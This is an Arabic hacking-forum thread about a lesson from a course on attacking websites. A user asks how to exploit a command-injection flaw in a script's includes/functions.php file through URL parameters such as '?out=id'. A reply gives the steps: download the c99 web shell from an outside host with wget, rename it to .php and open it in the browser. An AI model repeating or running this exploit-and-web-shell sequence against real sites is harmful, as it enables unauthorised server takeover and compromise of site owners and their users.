|
استفسار حول تطبيق درس من دروس دورة استهداف المواقع بسم الله الرحمن الرحيم السلام عليكم ورحمة الله وبركاته لقد انتبهت لشرح هذا الدرس جيدا الدرس السادس ( البحث في سكربتآت الموقع الهدف ) وهو كان للكشف عن ثغرات الاسكربتات على الموقع وحملت الاسكربت الموجود بالشرح ووجدت فيه نفس الثغرة بالشرح وهى من نوع كومند وهى فى الملف على المسار التالى http://www.site.com/up/includes/functions.php ويوجد ان الاستغلال يكون هكذا http://www.site.com/up/includes/func...php?returnt=id او هكذا http://www.site.com/up/includes/functions.php?out=id ارجوا انا تفيدونى انا ركبت الاسكربت على سيرفرى المحلى واريد التطبيق عليه اريد توضيح نقطة الاستغلال وكيفية تنفيذها بارك الله فيكم |
|
اقتباس:
لو سمحت انا كدا لم استفيد شىء انا عاوز اعرف الاومر اللى هطبقها من البداية حتى الاختراق علما بانى قمت بتركيب الاسكربت على سيرفرى المحلى للتدرب عليه |
اول شي حبيبي تجيب شل بصيغة txt وهذا شل بصيغة txt http://saldiri.org/c99.txt الان طبق الامر wget http://saldiri.org/c99.txt بعدين mv c99.txt c99.php بعدين استعرضه من المتصفح http://www.site.com/up/includes/c99.php |
| الساعة الآن 11:55 PM |
[ vBspiders.Com Network ]